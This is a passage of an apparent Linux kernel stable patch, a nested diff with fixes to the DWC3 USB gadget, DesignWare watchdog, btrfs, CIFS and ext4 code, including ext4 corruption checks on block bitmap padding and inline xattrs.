+ 		SPI_BPW_RANGE_MASK(1, mpc8xxx_spi->max_bits_per_word);
+ 
+ 	if (mpc8xxx_spi->flags & SPI_QE_CPU_MODE)
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index d2622378ce040..daa7673833557 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2468,7 +2468,7 @@ static void __dwc3_gadget_set_speed(struct dwc3 *dwc)
+ 	dwc3_writel(dwc->regs, DWC3_DCFG, reg);
+ }
+ 
+-static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on, int suspend)
++static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on)
+ {
+ 	u32			reg;
+ 	u32			timeout = 2000;
+@@ -2487,17 +2487,11 @@ static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on, int suspend)
+ 			reg &= ~DWC3_DCTL_KEEP_CONNECT;
+ 		reg |= DWC3_DCTL_RUN_STOP;
+ 
+-		if (dwc->has_hibernation)
+-			reg |= DWC3_DCTL_KEEP_CONNECT;
+-
+ 		__dwc3_gadget_set_speed(dwc);
+ 		dwc->pullups_connected = true;
+ 	} else {
+ 		reg &= ~DWC3_DCTL_RUN_STOP;
+ 
+-		if (dwc->has_hibernation && !suspend)
+-			reg &= ~DWC3_DCTL_KEEP_CONNECT;
+-
+ 		dwc->pullups_connected = false;
+ 	}
+ 
+@@ -2542,7 +2536,6 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	 * bit.
+ 	 */
+ 	dwc3_stop_active_transfers(dwc);
+-	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	/*
+@@ -2579,7 +2572,19 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	 * remaining event generated by the controller while polling for
+ 	 * DSTS.DEVCTLHLT.
+ 	 */
+-	return dwc3_gadget_run_stop(dwc, false, false);
++	ret = dwc3_gadget_run_stop(dwc, false);
++
++	/*
++	 * Stop the gadget after controller is halted, so that if needed, the
++	 * events to update EP0 state can still occur while the run/stop
++	 * routine polls for the halted state.  DEVTEN is cleared as part of
++	 * gadget stop.
++	 */
++	spin_lock_irqsave(&dwc->lock, flags);
++	__dwc3_gadget_stop(dwc);
++	spin_unlock_irqrestore(&dwc->lock, flags);
++
++	return ret;
+ }
+ 
+ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+@@ -2633,7 +2638,7 @@ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ 
+ 		dwc3_event_buffers_setup(dwc);
+ 		__dwc3_gadget_start(dwc);
+-		ret = dwc3_gadget_run_stop(dwc, true, false);
++		ret = dwc3_gadget_run_stop(dwc, true);
+ 	}
+ 
+ 	pm_runtime_put(dwc->dev);
+@@ -4200,30 +4205,6 @@ static void dwc3_gadget_suspend_interrupt(struct dwc3 *dwc,
+ 	dwc->link_state = next;
+ }
+ 
+-static void dwc3_gadget_hibernation_interrupt(struct dwc3 *dwc,
+-		unsigned int evtinfo)
+-{
+-	unsigned int is_ss = evtinfo & BIT(4);
+-
+-	/*
+-	 * WORKAROUND: DWC3 revision 2.20a with hibernation support
+-	 * have a known issue which can cause USB CV TD.9.23 to fail
+-	 * randomly.
+-	 *
+-	 * Because of this issue, core could generate bogus hibernation
+-	 * events which SW needs to ignore.
+-	 *
+-	 * Refers to:
+-	 *
+-	 * STAR#9000546576: Device Mode Hibernation: Issue in USB 2.0
+-	 * Device Fallback from SuperSpeed
+-	 */
+-	if (is_ss ^ (dwc->speed == USB_SPEED_SUPER))
+-		return;
+-
+-	/* enter hibernation here */
+-}
+-
+ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		const struct dwc3_event_devt *event)
+ {
+@@ -4241,11 +4222,7 @@ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		dwc3_gadget_wakeup_interrupt(dwc);
+ 		break;
+ 	case DWC3_DEVICE_EVENT_HIBER_REQ:
+-		if (dev_WARN_ONCE(dwc->dev, !dwc->has_hibernation,
+-					"unexpected hibernation event\n"))
+-			break;
+-
+-		dwc3_gadget_hibernation_interrupt(dwc, event->event_info);
++		dev_WARN_ONCE(dwc->dev, true, "unexpected hibernation event\n");
+ 		break;
+ 	case DWC3_DEVICE_EVENT_LINK_STATUS_CHANGE:
+ 		dwc3_gadget_linksts_change_interrupt(dwc, event->event_info);
+@@ -4582,7 +4559,7 @@ int dwc3_gadget_suspend(struct dwc3 *dwc)
+ 	if (!dwc->gadget_driver)
+ 		return 0;
+ 
+-	dwc3_gadget_run_stop(dwc, false, false);
++	dwc3_gadget_run_stop(dwc, false);
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc3_disconnect_gadget(dwc);
+@@ -4603,7 +4580,7 @@ int dwc3_gadget_resume(struct dwc3 *dwc)
+ 	if (ret < 0)
+ 		goto err0;
+ 
+-	ret = dwc3_gadget_run_stop(dwc, true, false);
++	ret = dwc3_gadget_run_stop(dwc, true);
+ 	if (ret < 0)
+ 		goto err1;
+ 
+diff --git a/drivers/watchdog/dw_wdt.c b/drivers/watchdog/dw_wdt.c
+index 52962e8d11a6f..61af5d1332ac6 100644
+--- a/drivers/watchdog/dw_wdt.c
++++ b/drivers/watchdog/dw_wdt.c
+@@ -635,7 +635,7 @@ static int dw_wdt_drv_probe(struct platform_device *pdev)
+ 
+ 	ret = dw_wdt_init_timeouts(dw_wdt, dev);
+ 	if (ret)
+-		goto out_disable_clk;
++		goto out_assert_rst;
+ 
+ 	wdd = &dw_wdt->wdd;
+ 	wdd->ops = &dw_wdt_ops;
+@@ -666,12 +666,15 @@ static int dw_wdt_drv_probe(struct platform_device *pdev)
+ 
+ 	ret = watchdog_register_device(wdd);
+ 	if (ret)
+-		goto out_disable_pclk;
++		goto out_assert_rst;
+ 
+ 	dw_wdt_dbgfs_init(dw_wdt);
+ 
+ 	return 0;
+ 
++out_assert_rst:
++	reset_control_assert(dw_wdt->rst);
++
+ out_disable_pclk:
+ 	clk_disable_unprepare(dw_wdt->pclk);
+ 
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index ec96285357e0a..2044f1e186297 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -122,7 +122,8 @@ static u64 block_rsv_release_bytes(struct btrfs_fs_info *fs_info,
+ 	} else {
+ 		num_bytes = 0;
+ 	}
+-	if (block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) {
++	if (qgroup_to_release_ret &&
++	    block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) {
+ 		qgroup_to_release = block_rsv->qgroup_rsv_reserved -
+ 				    block_rsv->qgroup_rsv_size;
+ 		block_rsv->qgroup_rsv_reserved = block_rsv->qgroup_rsv_size;
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index dcb510f38dda0..dbbae92ac23d8 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -4411,10 +4411,12 @@ int btrfs_del_items(struct btrfs_trans_handle *trans, struct btrfs_root *root,
+ int btrfs_prev_leaf(struct btrfs_root *root, struct btrfs_path *path)
+ {
+ 	struct btrfs_key key;
++	struct btrfs_key orig_key;
+ 	struct btrfs_disk_key found_key;
+ 	int ret;
+ 
+ 	btrfs_item_key_to_cpu(path->nodes[0], &key, 0);
++	orig_key = key;
+ 
+ 	if (key.offset > 0) {
+ 		key.offset--;
+@@ -4431,8 +4433,36 @@ int btrfs_prev_leaf(struct btrfs_root *root, struct btrfs_path *path)
+ 
+ 	btrfs_release_path(path);
+ 	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
+-	if (ret < 0)
++	if (ret <= 0)
+ 		return ret;
++
++	/*
++	 * Previous key not found. Even if we were at slot 0 of the leaf we had
++	 * before releasing the path and calling btrfs_search_slot(), we now may
++	 * be in a slot pointing to the same original key - this can happen if
++	 * after we released the path, one of more items were moved from a
++	 * sibling leaf into the front of the leaf we had due to an insertion
++	 * (see push_leaf_right()).
++	 * If we hit this case and our slot is > 0 and just decrement the slot
++	 * so that the caller does not process the same key again, which may or
++	 * may not break the caller, depending on its logic.
++	 */
++	if (path->slots[0] < btrfs_header_nritems(path->nodes[0])) {
++		btrfs_item_key(path->nodes[0], &found_key, path->slots[0]);
++		ret = comp_keys(&found_key, &orig_key);
++		if (ret == 0) {
++			if (path->slots[0] > 0) {
++				path->slots[0]--;
++				return 0;
++			}
++			/*
++			 * At slot 0, same key as before, it means orig_key is
++			 * the lowest, leftmost, key in the tree. We're done.
++			 */
++			return 1;
++		}
++	}
++
+ 	btrfs_item_key(path->nodes[0], &found_key, 0);
+ 	ret = comp_keys(&found_key, &key);
+ 	/*
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 5b1b5e1a63c8f..acae82a5f8ee6 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3215,23 +3215,34 @@ int btrfs_start_pre_rw_mount(struct btrfs_fs_info *fs_info)
+ {
+ 	int ret;
+ 	const bool cache_opt = btrfs_test_opt(fs_info, SPACE_CACHE);
+-	bool clear_free_space_tree = false;
++	bool rebuild_free_space_tree = false;
+ 
+ 	if (btrfs_test_opt(fs_info, CLEAR_CACHE) &&
+ 	    btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE)) {
+-		clear_free_space_tree = true;
++		rebuild_free_space_tree = true;
+ 	} else if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE) &&
+ 		   !btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE_VALID)) {
+ 		btrfs_warn(fs_info, "free space tree is invalid");
+-		clear_free_space_tree = true;
++		rebuild_free_space_tree = true;
+ 	}
+ 
+-	if (clear_free_space_tree) {
+-		btrfs_info(fs_info, "clearing free space tree");
+-		ret = btrfs_clear_free_space_tree(fs_info);
++	if (rebuild_free_space_tree) {
++		btrfs_info(fs_info, "rebuilding free space tree");
++		ret = btrfs_rebuild_free_space_tree(fs_info);
+ 		if (ret) {
+ 			btrfs_warn(fs_info,
+-				   "failed to clear free space tree: %d", ret);
++				   "failed to rebuild free space tree: %d", ret);
++			goto out;
++		}
++	}
++
++	if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE) &&
++	    !btrfs_test_opt(fs_info, FREE_SPACE_TREE)) {
++		btrfs_info(fs_info, "disabling free space tree");
++		ret = btrfs_delete_free_space_tree(fs_info);
++		if (ret) {
++			btrfs_warn(fs_info,
++				   "failed to disable free space tree: %d", ret);
+ 			goto out;
+ 		}
+ 	}
+diff --git a/fs/btrfs/file-item.c b/fs/btrfs/file-item.c
+index 6bb9fa961a6a1..4fab7da632594 100644
+--- a/fs/btrfs/file-item.c
++++ b/fs/btrfs/file-item.c
+@@ -47,13 +47,13 @@ void btrfs_inode_safe_disk_i_size_write(struct btrfs_inode *inode, u64 new_i_siz
+ 	u64 start, end, i_size;
+ 	int ret;
+ 
++	spin_lock(&inode->lock);
+ 	i_size = new_i_size ?: i_size_read(&inode->vfs_inode);
+ 	if (btrfs_fs_incompat(fs_info, NO_HOLES)) {
+ 		inode->disk_i_size = i_size;
+-		return;
++		goto out_unlock;
+ 	}
+ 
+-	spin_lock(&inode->lock);
+ 	ret = find_contiguous_extent_bit(&inode->file_extent_tree, 0, &start,
+ 					 &end, EXTENT_DIRTY);
+ 	if (!ret && start == 0)
+@@ -61,6 +61,7 @@ void btrfs_inode_safe_disk_i_size_write(struct btrfs_inode *inode, u64 new_i_siz
+ 	else
+ 		i_size = 0;
+ 	inode->disk_i_size = i_size;
++out_unlock:
+ 	spin_unlock(&inode->lock);
+ }
+ 
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 6a8f2bd350f4b..4cd8e44cba4c5 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -861,15 +861,16 @@ static int __load_free_space_cache(struct btrfs_root *root, struct inode *inode,
+ 			}
+ 			spin_lock(&ctl->tree_lock);
+ 			ret = link_free_space(ctl, e);
+-			ctl->total_bitmaps++;
+-			recalculate_thresholds(ctl);
+-			spin_unlock(&ctl->tree_lock);
+ 			if (ret) {
++				spin_unlock(&ctl->tree_lock);
+ 				btrfs_err(fs_info,
+ 					"Duplicate entries in free space cache, dumping");
+ 				kmem_cache_free(btrfs_free_space_cachep, e);
+ 				goto free_cache;
+ 			}
++			ctl->total_bitmaps++;
++			recalculate_thresholds(ctl);
++			spin_unlock(&ctl->tree_lock);
+ 			list_add_tail(&e->list, &bitmaps);
+ 		}
+ 
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index 367bcfcf68f51..e040eea3937d7 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -1247,7 +1247,7 @@ out:
+ 	return ret;
+ }
+ 
+-int btrfs_clear_free_space_tree(struct btrfs_fs_info *fs_info)
++int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info)
+ {
+ 	struct btrfs_trans_handle *trans;
+ 	struct btrfs_root *tree_root = fs_info->tree_root;
+@@ -1293,6 +1293,54 @@ abort:
+ 	return ret;
+ }
+ 
++int btrfs_rebuild_free_space_tree(struct btrfs_fs_info *fs_info)
++{
++	struct btrfs_trans_handle *trans;
++	struct btrfs_key key = {
++		.objectid = BTRFS_FREE_SPACE_TREE_OBJECTID,
++		.type = BTRFS_ROOT_ITEM_KEY,
++		.offset = 0,
++	};
++	struct btrfs_root *free_space_root = btrfs_global_root(fs_info, &key);
++	struct rb_node *node;
++	int ret;
++
++	trans = btrfs_start_transaction(free_space_root, 1);
++	if (IS_ERR(trans))
++		return PTR_ERR(trans);
++
++	set_bit(BTRFS_FS_CREATING_FREE_SPACE_TREE, &fs_info->flags);
++	set_bit(BTRFS_FS_FREE_SPACE_TREE_UNTRUSTED, &fs_info->flags);
++
++	ret = clear_free_space_tree(trans, free_space_root);
++	if (ret)
++		goto abort;
++
++	node = rb_first_cached(&fs_info->block_group_cache_tree);
++	while (node) {
++		struct btrfs_block_group *block_group;
++
++		block_group = rb_entry(node, struct btrfs_block_group,
++				       cache_node);
++		ret = populate_free_space_tree(trans, block_group);
++		if (ret)
++			goto abort;
++		node = rb_next(node);
++	}
++
++	btrfs_set_fs_compat_ro(fs_info, FREE_SPACE_TREE);
++	btrfs_set_fs_compat_ro(fs_info, FREE_SPACE_TREE_VALID);
++	clear_bit(BTRFS_FS_CREATING_FREE_SPACE_TREE, &fs_info->flags);
++
++	ret = btrfs_commit_transaction(trans);
++	clear_bit(BTRFS_FS_FREE_SPACE_TREE_UNTRUSTED, &fs_info->flags);
++	return ret;
++abort:
++	btrfs_abort_transaction(trans, ret);
++	btrfs_end_transaction(trans);
++	return ret;
++}
++
+ static int __add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 					struct btrfs_block_group *block_group,
+ 					struct btrfs_path *path)
+diff --git a/fs/btrfs/free-space-tree.h b/fs/btrfs/free-space-tree.h
+index dc2463e4cfe3c..6d5551d0ced81 100644
+--- a/fs/btrfs/free-space-tree.h
++++ b/fs/btrfs/free-space-tree.h
+@@ -18,7 +18,8 @@ struct btrfs_caching_control;
+ 
+ void set_free_space_tree_thresholds(struct btrfs_block_group *block_group);
+ int btrfs_create_free_space_tree(struct btrfs_fs_info *fs_info);
+-int btrfs_clear_free_space_tree(struct btrfs_fs_info *fs_info);
++int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info);
++int btrfs_rebuild_free_space_tree(struct btrfs_fs_info *fs_info);
+ int load_free_space_tree(struct btrfs_caching_control *caching_ctl);
+ int add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 			       struct btrfs_block_group *block_group);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 0e516aefbf51b..56e9efbffd58e 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3237,6 +3237,9 @@ int btrfs_finish_ordered_io(struct btrfs_ordered_extent *ordered_extent)
+ 		btrfs_rewrite_logical_zoned(ordered_extent);
+ 		btrfs_zone_finish_endio(fs_info, ordered_extent->disk_bytenr,
+ 					ordered_extent->disk_num_bytes);
++	} else if (btrfs_is_data_reloc_root(inode->root)) {
++		btrfs_zone_finish_endio(fs_info, ordered_extent->disk_bytenr,
++					ordered_extent->disk_num_bytes);
+ 	}
+ 
+ 	btrfs_free_io_failure_record(inode, start, end);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 0cebc203c4ccc..9de647e48e7eb 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -443,7 +443,9 @@ void btrfs_exclop_balance(struct btrfs_fs_info *fs_info,
+ 	case BTRFS_EXCLOP_BALANCE_PAUSED:
+ 		spin_lock(&fs_info->super_lock);
+ 		ASSERT(fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE ||
+-		       fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD);
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD ||
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_NONE ||
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED);
+ 		fs_info->exclusive_operation = BTRFS_EXCLOP_BALANCE_PAUSED;
+ 		spin_unlock(&fs_info->super_lock);
+ 		break;
+diff --git a/fs/btrfs/print-tree.c b/fs/btrfs/print-tree.c
+index dd8777872143a..228eeb04d03d3 100644
+--- a/fs/btrfs/print-tree.c
++++ b/fs/btrfs/print-tree.c
+@@ -148,10 +148,10 @@ static void print_extent_item(struct extent_buffer *eb, int slot, int type)
+ 			pr_cont("shared data backref parent %llu count %u\n",
+ 			       offset, btrfs_shared_data_ref_count(eb, sref));
+ 			/*
+-			 * offset is supposed to be a tree block which
+-			 * must be aligned to nodesize.
++			 * Offset is supposed to be a tree block which must be
++			 * aligned to sectorsize.
+ 			 */
+-			if (!IS_ALIGNED(offset, eb->fs_info->nodesize))
++			if (!IS_ALIGNED(offset, eb->fs_info->sectorsize))
+ 				pr_info(
+ 			"\t\t\t(parent %llu not aligned to sectorsize %u)\n",
+ 				     offset, eb->fs_info->sectorsize);
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index e43b16199e22b..6438300fa2461 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -1136,7 +1136,11 @@ out:
+ 	    !btrfs_test_opt(info, CLEAR_CACHE)) {
+ 		btrfs_err(info, "cannot disable free space tree");
+ 		ret = -EINVAL;
+-
++	}
++	if (btrfs_fs_compat_ro(info, BLOCK_GROUP_TREE) &&
++	     !btrfs_test_opt(info, FREE_SPACE_TREE)) {
++		btrfs_err(info, "cannot disable free space tree with block-group-tree feature");
++		ret = -EINVAL;
+ 	}
+ 	if (!ret)
+ 		ret = btrfs_check_mountopts_zoned(info);
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index e97c5a1ac95d6..836babd23db52 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -119,10 +119,9 @@ static int sb_write_pointer(struct block_device *bdev, struct blk_zone *zones,
+ 		int i;
+ 
+ 		for (i = 0; i < BTRFS_NR_SB_LOG_ZONES; i++) {
+-			u64 bytenr;
+-
+-			bytenr = ((zones[i].start + zones[i].len)
+-				   << SECTOR_SHIFT) - BTRFS_SUPER_INFO_SIZE;
++			u64 zone_end = (zones[i].start + zones[i].capacity) << SECTOR_SHIFT;
++			u64 bytenr = ALIGN_DOWN(zone_end, BTRFS_SUPER_INFO_SIZE) -
++						BTRFS_SUPER_INFO_SIZE;
+ 
+ 			page[i] = read_cache_page_gfp(mapping,
+ 					bytenr >> PAGE_SHIFT, GFP_NOFS);
+@@ -1163,12 +1162,12 @@ int btrfs_ensure_empty_zones(struct btrfs_device *device, u64 start, u64 size)
+ 		return -ERANGE;
+ 
+ 	/* All the zones are conventional */
+-	if (find_next_bit(zinfo->seq_zones, begin, end) == end)
++	if (find_next_bit(zinfo->seq_zones, end, begin) == end)
+ 		return 0;
+ 
+ 	/* All the zones are sequential and empty */
+-	if (find_next_zero_bit(zinfo->seq_zones, begin, end) == end &&
+-	    find_next_zero_bit(zinfo->empty_zones, begin, end) == end)
++	if (find_next_zero_bit(zinfo->seq_zones, end, begin) == end &&
++	    find_next_zero_bit(zinfo->empty_zones, end, begin) == end)
+ 		return 0;
+ 
+ 	for (pos = start; pos < start + size; pos += zinfo->zone_size) {
+@@ -1605,11 +1604,11 @@ void btrfs_redirty_list_add(struct btrfs_transaction *trans,
+ 	    !list_empty(&eb->release_list))
+ 		return;
+ 
++	memzero_extent_buffer(eb, 0, eb->len);
++	set_bit(EXTENT_BUFFER_NO_CHECK, &eb->bflags);
+ 	set_extent_buffer_dirty(eb);
+ 	set_extent_bits_nowait(&trans->dirty_pages, eb->start,
+ 			       eb->start + eb->len - 1, EXTENT_DIRTY);
+-	memzero_extent_buffer(eb, 0, eb->len);
+-	set_bit(EXTENT_BUFFER_NO_CHECK, &eb->bflags);
+ 
+ 	spin_lock(&trans->releasing_ebs_lock);
+ 	list_add_tail(&eb->release_list, &trans->releasing_ebs);
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 03e3e95cf25b2..078df1e2dd18a 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -743,6 +743,7 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
++	cifs_close_all_deferred_files(tcon);
+ 	/* cancel_brl_requests(tcon); */ /* BB mark all brl mids as exiting */
+ 	/* cancel_notify_requests(tcon); */
+ 	if (tcon->ses && tcon->ses->server) {
+@@ -758,6 +759,20 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	return;
+ }
+ 
++static int cifs_freeze(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon;
++
++	if (cifs_sb == NULL)
++		return 0;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	cifs_close_all_deferred_files(tcon);
++	return 0;
++}
++
+ #ifdef CONFIG_CIFS_STATS2
+ static int cifs_show_stats(struct seq_file *s, struct dentry *root)
+ {
+@@ -796,6 +811,7 @@ static const struct super_operations cifs_super_ops = {
+ 	as opens */
+ 	.show_options = cifs_show_options,
+ 	.umount_begin   = cifs_umount_begin,
++	.freeze_fs      = cifs_freeze,
+ #ifdef CONFIG_CIFS_STATS2
+ 	.show_stats = cifs_show_stats,
+ #endif
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 21b31d1640e57..935fe198a4baf 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2742,6 +2742,13 @@ cifs_match_super(struct super_block *sb, void *data)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	cifs_sb = CIFS_SB(sb);
++
++	/* We do not want to use a superblock that has been shutdown */
++	if (CIFS_MOUNT_SHUTDOWN & cifs_sb->mnt_cifs_flags) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return 0;
++	}
++
+ 	tlink = cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
+ 	if (tlink == NULL) {
+ 		/* can not match superblock if tlink were ever null */
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index ccf311750927b..7468f8baf4990 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -1682,7 +1682,7 @@ smb2_copychunk_range(const unsigned int xid,
+ 		pcchunk->SourceOffset = cpu_to_le64(src_off);
+ 		pcchunk->TargetOffset = cpu_to_le64(dest_off);
+ 		pcchunk->Length =
+-			cpu_to_le32(min_t(u32, len, tcon->max_bytes_chunk));
++			cpu_to_le32(min_t(u64, len, tcon->max_bytes_chunk));
+ 
+ 		/* Request server copy to target from src identified by key */
+ 		kfree(retbuf);
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index 8ff4b9192a9f5..f2c415f31b755 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -303,6 +303,22 @@ struct ext4_group_desc * ext4_get_group_desc(struct super_block *sb,
+ 	return desc;
+ }
+ 
++static ext4_fsblk_t ext4_valid_block_bitmap_padding(struct super_block *sb,
++						    ext4_group_t block_group,
++						    struct buffer_head *bh)
++{
++	ext4_grpblk_t next_zero_bit;
++	unsigned long bitmap_size = sb->s_blocksize * 8;
++	unsigned int offset = num_clusters_in_group(sb, block_group);
++
++	if (bitmap_size <= offset)
++		return 0;
++
++	next_zero_bit = ext4_find_next_zero_bit(bh->b_data, bitmap_size, offset);
++
++	return (next_zero_bit < bitmap_size ? next_zero_bit : 0);
++}
++
+ /*
+  * Return the block number which was discovered to be invalid, or 0 if
+  * the block bitmap is valid.
+@@ -401,6 +417,15 @@ static int ext4_validate_block_bitmap(struct super_block *sb,
+ 					EXT4_GROUP_INFO_BBITMAP_CORRUPT);
+ 		return -EFSCORRUPTED;
+ 	}
++	blk = ext4_valid_block_bitmap_padding(sb, block_group, bh);
++	if (unlikely(blk != 0)) {
++		ext4_unlock_group(sb, block_group);
++		ext4_error(sb, "bg %u: block %llu: padding at end of block bitmap is not set",
++			   block_group, blk);
++		ext4_mark_group_bitmap_corrupted(sb, block_group,
++						 EXT4_GROUP_INFO_BBITMAP_CORRUPT);
++		return -EFSCORRUPTED;
++	}
+ 	set_buffer_verified(bh);
+ verified:
+ 	ext4_unlock_group(sb, block_group);
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 7ada374ff27d7..44e83521bfded 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -269,14 +269,12 @@ static void __es_find_extent_range(struct inode *inode,
+ 
+ 	/* see if the extent has been cached */
+ 	es->es_lblk = es->es_len = es->es_pblk = 0;
+-	if (tree->cache_es) {
+-		es1 = tree->cache_es;
+-		if (in_range(lblk, es1->es_lblk, es1->es_len)) {
+-			es_debug("%u cached by [%u/%u) %llu %x\n",
+-				 lblk, es1->es_lblk, es1->es_len,
+-				 ext4_es_pblock(es1), ext4_es_status(es1));
+-			goto out;
+-		}
++	es1 = READ_ONCE(tree->cache_es);
++	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len)) {
++		es_debug("%u cached by [%u/%u) %llu %x\n",
++			 lblk, es1->es_lblk, es1->es_len,
++			 ext4_es_pblock(es1), ext4_es_status(es1));
++		goto out;
+ 	}
+ 
+ 	es1 = __es_tree_search(&tree->root, lblk);
+@@ -295,7 +293,7 @@ out:
+ 	}
+ 
+ 	if (es1 && matching_fn(es1)) {
+-		tree->cache_es = es1;
++		WRITE_ONCE(tree->cache_es, es1);
+ 		es->es_lblk = es1->es_lblk;
+ 		es->es_len = es1->es_len;
+ 		es->es_pblk = es1->es_pblk;
+@@ -933,14 +931,12 @@ int ext4_es_lookup_extent(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	/* find extent in cache firstly */
+ 	es->es_lblk = es->es_len = es->es_pblk = 0;
+-	if (tree->cache_es) {
+-		es1 = tree->cache_es;
+-		if (in_range(lblk, es1->es_lblk, es1->es_len)) {
+-			es_debug("%u cached by [%u/%u)\n",
+-				 lblk, es1->es_lblk, es1->es_len);
+-			found = 1;
+-			goto out;
+-		}
++	es1 = READ_ONCE(tree->cache_es);
++	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len)) {
++		es_debug("%u cached by [%u/%u)\n",
++			 lblk, es1->es_lblk, es1->es_len);
++		found = 1;
++		goto out;
+ 	}
+ 
+ 	node = tree->root.rb_node;
+diff --git a/fs/ext4/hash.c b/fs/ext4/hash.c
+index 147b5241dd94f..46c3423ddfa17 100644
+--- a/fs/ext4/hash.c
++++ b/fs/ext4/hash.c
+@@ -277,7 +277,11 @@ static int __ext4fs_dirhash(const struct inode *dir, const char *name, int len,
+ 	}
+ 	default:
+ 		hinfo->hash = 0;
+-		return -1;
++		hinfo->minor_hash = 0;
++		ext4_warning(dir->i_sb,
++			     "invalid/unsupported hash tree version %u",
++			     hinfo->hash_version);
++		return -EINVAL;
+ 	}
+ 	hash = hash & ~1;
+ 	if (hash == (EXT4_HTREE_EOF_32BIT << 1))
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index c4475a74c7626..3a91be1d9bbe7 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -34,6 +34,7 @@ static int get_max_inline_xattr_value_size(struct inode *inode,
+ 	struct ext4_xattr_ibody_header *header;
+ 	struct ext4_xattr_entry *entry;
+ 	struct ext4_inode *raw_inode;
++	void *end;
+ 	int free, min_offs;
+ 
+ 	if (!EXT4_INODE_HAS_XATTR_SPACE(inode))
+@@ -57,14 +58,23 @@ static int get_max_inline_xattr_value_size(struct inode *inode,
+ 	raw_inode = ext4_raw_inode(iloc);
+ 	header = IHDR(inode, raw_inode);
+ 	entry = IFIRST(header);
++	end = (void *)raw_inode + EXT4_SB(inode->i_sb)->s_inode_size;
+ 
+ 	/* Compute min_offs. */
+-	for (; !IS_LAST_ENTRY(entry); entry = EXT4_XATTR_NEXT(entry)) {
++	while (!IS_LAST_ENTRY(entry)) {
++		void *next = EXT4_XATTR_NEXT(entry);
++
++		if (next >= end) {
++			EXT4_ERROR_INODE(inode,
++					 "corrupt xattr in inline inode");
++			return 0;
